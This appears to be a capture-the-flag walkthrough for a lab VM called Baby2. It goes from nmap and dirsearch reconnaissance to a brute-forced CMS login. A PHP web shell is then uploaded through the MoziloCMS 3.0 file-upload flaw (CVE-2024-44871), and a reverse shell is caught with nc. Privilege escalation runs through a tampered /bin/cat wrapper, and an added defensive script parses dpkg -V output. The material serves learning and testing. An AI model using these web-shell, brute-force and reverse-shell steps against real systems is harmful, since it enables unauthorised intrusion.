Baby2

Target description

  • QQ group: 660930334

I. Information gathering

1. Host discovery

┌──(root㉿kali)-[/miaosec/maze-sec]
└─# nmap -sn 192.168.2.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-10-14 15:55 CST
Nmap scan report for 192.168.2.1
Host is up (0.00046s latency).
MAC Address: 0A:00:27:00:00:07 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00041s latency).
MAC Address: 08:00:27:05:42:68 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.22
Host is up (0.00062s latency).
MAC Address: 08:00:27:4B:3B:00 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.16 seconds

Target IP: 192.168.2.22

2. Port scanning

(1) Full port scan

┌──(root㉿kali)-[/miaosec/maze-sec]
└─# nmap --min-rate 10000 -p- 192.168.2.22
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-10-14 15:55 CST
Nmap scan report for 192.168.2.22
Host is up (0.0012s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:4B:3B:00 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 31.42 seconds

Open ports: 22 and 80

(2) Detailed service scan

┌──(root㉿kali)-[/miaosec/maze-sec]
└─# nmap --min-rate 10000 -sT -sV -sC -O -p22,80 192.168.2.22
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-10-14 15:56 CST
Nmap scan report for 192.168.2.22
Host is up (0.0019s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.62 (Debian)
MAC Address: 08:00:27:4B:3B:00 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.71 seconds

II. Web penetration

1. Information disclosure

Browse to port 80 and view the page source; it contains a hint:

┌──(root㉿kali)-[/miaosec/maze-sec]
└─# curl http://192.168.2.22
index
<!-- The new password does not comply with the rules (at least 8 characters, small and large letters and numbers). -->
<!-- Admin*** -->

Hint: the current password does not meet the stated policy, and the comment gives the current password as Admin***, with the last three characters unknown.

2. Directory scanning

The hint suggests that a login page exists, so run a directory scan to find it:

┌──(root㉿kali)-[/miaosec/maze-sec]
└─# dirsearch -u "http://192.168.2.22"
....
[16:02:05] 200 - 2KB - /wordpress/
....

The scan finds a /wordpress/ path; visiting it shows that the application is actually moziloCMS.

Run a second directory scan against /wordpress:

┌──(root㉿kali)-[/miaosec/maze-sec]
└─# dirsearch -u "http://192.168.2.22/wordpress"
....
[16:03:18] 200 - 0B - /wordpress/admin/admin.php
[16:03:19] 200 - 0B - /wordpress/admin/config.php
[16:03:19] 200 - 11KB - /wordpress/admin/
[16:03:19] 200 - 0B - /wordpress/admin/files.php
[16:03:19] 200 - 0B - /wordpress/admin/home.php
[16:03:20] 200 - 0B - /wordpress/admin/login.php
[16:03:20] 200 - 11KB - /wordpress/admin/index.php
[16:03:37] 301 - 320B - /wordpress/cms -> http://192.168.2.22/wordpress/cms/
[16:03:38] 200 - 832B - /wordpress/cms/
[16:03:54] 200 - 2KB - /wordpress/install.php
[16:03:55] 200 - 2KB - /wordpress/install.php?profile=default
[16:03:57] 200 - 502B - /wordpress/layouts/
[16:04:13] 301 - 324B - /wordpress/plugins -> http://192.168.2.22/wordpress/plugins/
[16:04:14] 200 - 534B - /wordpress/plugins/
[16:04:17] 200 - 3KB - /wordpress/README.md
[16:04:17] 200 - 360B - /wordpress/readme.txt
[16:04:19] 200 - 114B - /wordpress/robots.txt
[16:04:24] 200 - 300B - /wordpress/sitemap.xml
[16:04:31] 301 - 320B - /wordpress/tmp -> http://192.168.2.22/wordpress/tmp/
[16:04:32] 200 - 485B - /wordpress/tmp/
[16:04:33] 200 - 0B - /wordpress/update.php
....

The login page is at /wordpress/admin.

3. Password brute force

Use Burp Suite to brute-force the last three characters of Admin***; the password turns out to be Admin123.

III. MoziloCMS 3.0 RCE (CVE-2024-44871)

Exploitation steps:

1. Log in as admin
2. Go to the Files section in the left menu
3. Create a .jpg file whose contents are a PHP web shell
4. Upload the file to the server via the upload icon and save
5. Rename the file to .php on the web server and save
6. Access the web shell via this endpoint:
http://127.0.0.1/mozilo3.0-3.0.1/kategorien/Willkommen/dateien/revshell.php

Following these steps, upload a reverse shell and catch the connection:

┌──(root㉿kali)-[/miaosec/maze-sec]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.2.4] from (UNKNOWN) [192.168.2.22] 42170
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Upgrade to a stable shell:

script /dev/null -c bash
# press Ctrl+Z to suspend it
stty raw -echo; fg
# press Enter
reset xterm
export TERM=xterm
export SHELL=/bin/bash
stty rows 24 columns 80

IV. Privilege escalation

1. Getting the aristore account

Look at user.txt:

www-data@Baby2:/home/aristore$ ls -la user.txt 
-rw-r--r-- 1 root root 70 Oct 13 06:01 user.txt
www-data@Baby2:/home/aristore$ cat user.txt
flag{fake-flag}

The file is 70 bytes, but cat printed far less than that, so try reading it backwards with tac:

www-data@Baby2:/home/aristore$ tac user.txt 
aristore:aristorearistore
flag{user-b6cc0757c4a3108795d0803f9e82b9d3}

This reveals aristore's password, aristorearistore; switch to that user:

www-data@Baby2:/home/aristore$ su aristore
Password:
aristore@Baby2:~$ id
uid=1000(aristore) gid=1000(aristore) groups=1000(aristore)

2. cat has been tampered with

Use dpkg -V to verify the installed packages against their recorded digests:

aristore@Baby2:~$ dpkg -V
??5?????? c /etc/irssi.conf
??5?????? c /etc/apache2/apache2.conf
??5?????? /bin/cat
dpkg: warning: systemd: unable to open /var/lib/polkit-1/localauthority/10-vendor.d/systemd-networkd.pkla for hash: Permission denied
??5?????? /var/lib/polkit-1/localauthority/10-vendor.d/systemd-networkd.pkla
??5?????? c /etc/grub.d/10_linux
??5?????? c /etc/grub.d/40_custom
dpkg: warning: sudo: unable to open /etc/sudoers for hash: Permission denied
??5?????? c /etc/sudoers
dpkg: warning: sudo: unable to open /etc/sudoers.d/README for hash: Permission denied
??5?????? c /etc/sudoers.d/README
dpkg: warning: inspircd: unable to open /etc/inspircd/inspircd.conf for hash: Permission denied
??5?????? c /etc/inspircd/inspircd.conf
dpkg: warning: inspircd: unable to open /etc/inspircd/inspircd.motd for hash: Permission denied
??5?????? c /etc/inspircd/inspircd.motd
dpkg: warning: inspircd: unable to open /etc/inspircd/inspircd.rules for hash: Permission denied
??5?????? c /etc/inspircd/inspircd.rules
dpkg: warning: packagekit: unable to open /var/lib/polkit-1/localauthority/10-vendor.d/org.freedesktop.packagekit.pkla for hash: Permission denied
??5?????? /var/lib/polkit-1/localauthority/10-vendor.d/org.freedesktop.packagekit.pkla
??5?????? c /etc/issue

/bin/cat is listed as modified. Check which cat is actually found on the PATH:

aristore@Baby2:~$ which cat
/usr/bin/cat

Inspect /bin/cat:

aristore@Baby2:~$ strings /bin/cat
#!/bin/bash
[[ "$1" == user.txt ]] && echo "flag{fake-flag}" && exit 1
/usr/bin/cat2 "$@"
# b4b8daf4b8ea9d39568719e1e320076f

The wrapper script contains a hash, b4b8daf4b8ea9d39568719e1e320076f.

Cracking it gives the password rootroot.
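As an added example (not part of the original post), the following Python script shows how a defender would act on a dpkg -V listing like the one above: it parses the verification lines, flags digest mismatches on non-conffile paths under executable directories, and classifies a flagged file by its leading bytes, so a shell-script wrapper standing in for an ELF coreutils binary, like the /bin/cat found here, stands out. The embedded dpkg -V excerpt is constructed from the listing above.

```python
"""Spot replaced system binaries in `dpkg -V` output (added example, constructed input)."""
import re

# Constructed excerpt modelled on the dpkg -V listing in this walkthrough.
SAMPLE_DPKG_V = """\
??5?????? c /etc/irssi.conf
??5?????? c /etc/apache2/apache2.conf
??5?????? /bin/cat
dpkg: warning: sudo: unable to open /etc/sudoers for hash: Permission denied
??5?????? c /etc/sudoers
??5?????? /var/lib/polkit-1/localauthority/10-vendor.d/systemd-networkd.pkla
"""

# Directories where a digest mismatch on a non-conffile is almost never legitimate.
BIN_DIRS = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/", "/lib/", "/usr/lib/")

# A dpkg -V line is nine attribute flags, an optional "c" conffile marker, then the path.
# dpkg only verifies the MD5 digest, so a mismatch shows as "5" in the third column.
LINE_RE = re.compile(r"^(?P<flags>[?.5SMDLUGT]{9})\s+(?:(?P<conf>c)\s+)?(?P<path>/\S+)$")


def parse_dpkg_verify(text):
    """Return (flags, is_conffile, path) per verification line; warnings are skipped."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            entries.append((m["flags"], m["conf"] == "c", m["path"]))
    return entries


def suspicious_paths(entries):
    """Non-conffile files with a digest mismatch that live in an executable directory."""
    return [path for flags, conf, path in entries
            if not conf and flags[2] == "5" and path.startswith(BIN_DIRS)]


def classify_header(head):
    """Classify a file by its magic bytes: a coreutils binary should be ELF, not a script."""
    if head.startswith(b"\x7fELF"):
        return "elf"
    if head.startswith(b"#!"):
        return "script"
    return "other"


def classify_file(path):
    """Read the first bytes of a real file on disk and classify it."""
    with open(path, "rb") as fh:
        return classify_header(fh.read(4))


if __name__ == "__main__":
    # On a live host, feed in subprocess.run(["dpkg", "-V"], capture_output=True, text=True).stdout
    for path in suspicious_paths(parse_dpkg_verify(SAMPLE_DPKG_V)):
        print(f"modified binary: {path}")
```

Conffile changes (the "c" entries) are expected on any configured system; the signal is a changed file that is not a conffile and lives where executables do.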

3. Getting root

Log in with the recovered password:

aristore@Baby2:~$ su root
Password:
root@Baby2:/home/aristore# id
uid=0(root) gid=0(root) groups=0(root)

V. Flags

root@Baby2:/home/aristore# cat /home/aristore/user.txt /root/root.txt 
flag{user-b6cc0757c4a3108795d0803f9e82b9d3}
aristore:aristorearistore
flag{root-9741bedefe0f692a60ace05be4311fe5}

Baby2
http://miao-sec.github.io/Maze-sec/Baby2/
Author: Miao
Published: 9 January 2026
License: BY-MIAO